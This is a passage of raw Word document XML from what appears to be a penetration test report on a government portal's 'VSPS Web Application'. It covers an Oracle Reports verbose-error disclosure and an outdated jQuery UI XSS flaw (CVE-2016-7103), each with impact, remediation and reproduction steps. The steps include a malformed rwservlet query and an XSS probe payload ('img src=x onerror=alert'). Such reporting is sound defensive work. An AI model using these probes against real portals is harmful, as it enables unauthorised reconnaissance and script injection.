              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM CVSS 5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C1FE062"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157B4D4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DEFCCAC"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38B9762" w14:textId="47A7EF10"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032</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D3B6D95"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BE7C4F2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.3 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6AC6B24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64FB28C"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8168F9"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1A4D034"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AD43A1F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1CEF28A5"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3B2CAF9"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D21A9AB"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F76DE95"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E45F5B0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5F9643F3"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DF71544"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AF78495"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4A6086A"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09DC4DE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="30916AF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2B9B02C"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8A85B3B"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DC0B8B4"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57ABC29" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55C0E85C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649EE377" w14:textId="4153E525" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application is susceptible to information disclosure due to the Oracle Reports service revealing overly verbose error messages, specifically the "REP-52266" error, along with exposed internal URLs. This vulnerability arises from inadequate error handling configuration or an outdated Oracle Reports instance that provides detailed system information to an unauthenticated or authenticated attacker. The root cause is typically a misconfiguration in the Oracle Reports server or the web server hosting it, failing to suppress detailed technical information in production environments. When an attacker accesses a malformed URL or a specific Oracle Reports endpoint, the system responds with an error message containing internal file paths, application server details, or other diagnostic information that should not be publicly accessible. This exposed information can significantly reduce the effort required for an attacker to understand the application's architecture, identify potential attack vectors, or prepare more sophisticated attacks against the Oracle database or underlying Linux Red Hat system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E894876" w14:textId="087C8F73" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADB6DA" w14:textId="4066A8D5" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This vulnerability presents significant risks to the organization, potentially leading to financial losses, regulatory non-compliance, and severe reputational damage. The exposure of internal system details and error messages provides a blueprint for malicious actors to understand the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application's infrastructure, facilitating targeted attacks. This reconnaissance capability can lead to unauthorized data access, system compromise, or service disruption. In a government context, such information disclosure could violate NIST CSF requirements for protecting confidentiality and integrity of data and systems. A successful breach stemming from this initial information gathering could result in costly incident response, legal fees, and potential regulatory fines, especially if sensitive government or citizen data is involved. Beyond financial penalties, the exposure of internal system vulnerabilities erodes public trust and damages the organization's reputation, impacting stakeholder confidence and potentially leading to long-term operational challenges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4C96D3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742D705" w14:textId="4F0E137C" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STRATEGIC FIX (Architecture):- Implement a robust, centralized error handling mechanism across the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application that ensures only generic, non-informative error messages are displayed to end-users in production environments.- Architect the application to isolate the Oracle Reports service behind an appropriately configured web application firewall (WAF) or reverse proxy, preventing direct public exposure of internal diagnostic endpoints.- Regularly review and update the security baseline configurations for all application components, including Oracle Reports, web servers, and application servers, to align with secure development and deployment best practices.- Establish a continuous vulnerability management program to regularly scan and patch components like Oracle Reports and the underlying Linux operating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system.TACTICAL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIX (Code Implementation):- Configure the Oracle Reports server (e.g., via configuration files like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rwservlet.properties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the Oracle Fusion Middleware Control) to disable verbose error reporting and prevent the display of detailed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>system information, including stack traces, file paths, and database connection strings.- Ensure the web server (e.g., Apache HTTP Server) serving Oracle Reports is configured to provide custom error pages for common HTTP status codes (e.g., 404, 500) that do not reveal internal details.- Validate all user inputs rigorously to prevent the triggering of unexpected errors that might expose system information.- Immediately apply all available security patches and updates for Oracle Reports, Oracle Database, and the underlying Linux Red Hat operating system to mitigate known vulnerabilities that could lead to information disclosure or other exploits.- Change default credentials and enforce strong authentication for all administrative interfaces related to Oracle Reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3FC7C3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF61BA" w14:textId="449FA484" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify the publicly accessible URL for the Oracle Reports service within the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application. This might involve attempting common Oracle Reports servlet paths (e.g., /reports/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rwservlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, /forms/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>frmservlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) or specific paths identified during reconnaissance.2. Navigate to the identified Oracle Reports URL in a web browser or use a tool like cURL.3. Observe the web page for any detailed error messages, specifically looking for "REP-52266" or other error codes that reveal system information.4. Attempt to manipulate URL parameters or send malformed requests to trigger different error conditions and identify further information disclosure. For example, try appending non-existent report names or invalid parameters (e.g., /reports/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rwservlet?report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nonexistent&amp;p_param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=test%27).5. Capture and analyze the full HTTP response, including headers and body, for any sensitive information such as internal file paths, server versions, database connection details, or development environment artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4E6E7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0AE696"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73C79409"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133CEAF3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Vulnerable Component: jQuery UI Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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230E39AE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM CVSS 6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A871694"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5935E60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B7A089A"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3A8D7CE" w14:textId="43379841"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020</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F6BEE34"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A9DF7BD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3B480C60"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3C56DC3"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8108A8F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable and Outdated Components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DA07D0C"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0E9FAD1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="027ACA3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60FA0A8"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0932872"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88367F8"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43864AC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="65F934D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BAC6E82"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118327D"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855DE44"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13CD662" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="725743D1"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46DABCC"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E647CB7"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0113686"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F657570" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2BF2204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8D1AC21" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4250" w:type="pct"/>
            <w:gridSpan w:val="3"/>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tcPr>
          <w:p w14:paraId="3EC52390" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>https://nvd.nist.gov/vuln/detail/CVE-2016-7103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02CD4340" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1799A09B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The application utilizes an outdated version of the jQuery UI library, specifically version 1.8.16. This version is known to contain several security vulnerabilities, including Cross-Site Scripting (XSS). The root cause of this vulnerability lies in insufficient input validation and output encoding within certain jQuery UI widgets, such as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>datepicker's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>altField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. When user-controlled input is reflected in the web page without proper sanitization, an attacker can inject malicious client-side scripts. Exploitation occurs when an attacker crafts a malicious URL or manipulates input fields that are processed by the vulnerable jQuery UI components. If a legitimate user accesses a page incorporating this malicious input, the injected script executes within the user's browser in the context of the application's domain. This can lead to session hijacking, unauthorized data access, redirection to malicious sites, or defacement of the web application. The affected components include any parts of the gov portal that leverage jQuery UI widgets and display user-controlled data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3102E" w14:textId="35851829" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F80BC8F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Utilizing outdated software components like jQuery UI 1.8.16 in the government portal exposes the organization to significant business risks. An attacker could exploit known vulnerabilities to gain unauthorized access to user sessions, potentially compromising sensitive government data or personal identifiable information (PII) of citizens. This could lead to severe financial penalties, particularly under NIST CSF compliance requirements, and potential legal liabilities associated with data breaches. The integrity of official information presented on the portal could be compromised, leading to public misinformation and eroding trust in government services. Furthermore, a successful attack could cause significant reputational damage, decrease public confidence in the government's ability to secure its systems, and incur substantial costs for incident response, forensic investigations, and remediation efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE7991" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A6B52" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STRATEGIC FIX (Architecture): Implement a robust Software Component Analysis (SCA) and patch management program across all applications. Establish a policy requiring regular audits and updates of all third-party libraries and frameworks to their latest stable and secure versions. Prioritize the replacement of end-of-life or unsupported components. Incorporate security scanning tools into the CI/CD pipeline to automatically detect outdated and vulnerable dependencies. TACTICAL FIX (Code Implementation): Immediately upgrade the jQuery UI library to the latest stable and secure version available (e.g., 1.13.2 or newer, depending on compatibility requirements). Ensure that all user-supplied input, regardless of its source, is properly validated on the server-side and robustly output-encoded before being rendered in HTML. Specifically, review all instances where jQuery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UI widgets process or display user-controlled data and apply context-aware encoding. Consider implementing Content Security Policy (CSP) headers to mitigate the impact of potential client-side script injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5493F2BE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD44794" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify the presence of jQuery UI version 1.8.16 on the target gov portal by inspecting the source code of the web pages (e.g., look for script tags loading jquery-ui-1.8.16.min.js). 2. Identify a web page that uses a jQuery UI widget that processes user-controlled input, such as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>datepicker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, dialog, or tooltip. For example, look for input fields associated with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>datepicker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. 3. As an example for CVE-2016-7103, locate an input field associated with a jQuery UI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>datepicker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that uses the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>altField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' option. 4. Intercept the request to the vulnerable page or manipulate the URL to inject malicious input into the parameter that is eventually rendered in the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>altField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'. For instance, if the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>altField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' parameter reflects in an attribute, try injecting "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)&gt;". 5. Observe if the injected script executes in the user's browser, indicated by an alert box displaying the domain or other client-side effects.</w:t>
      </w:r>
    </w:p>
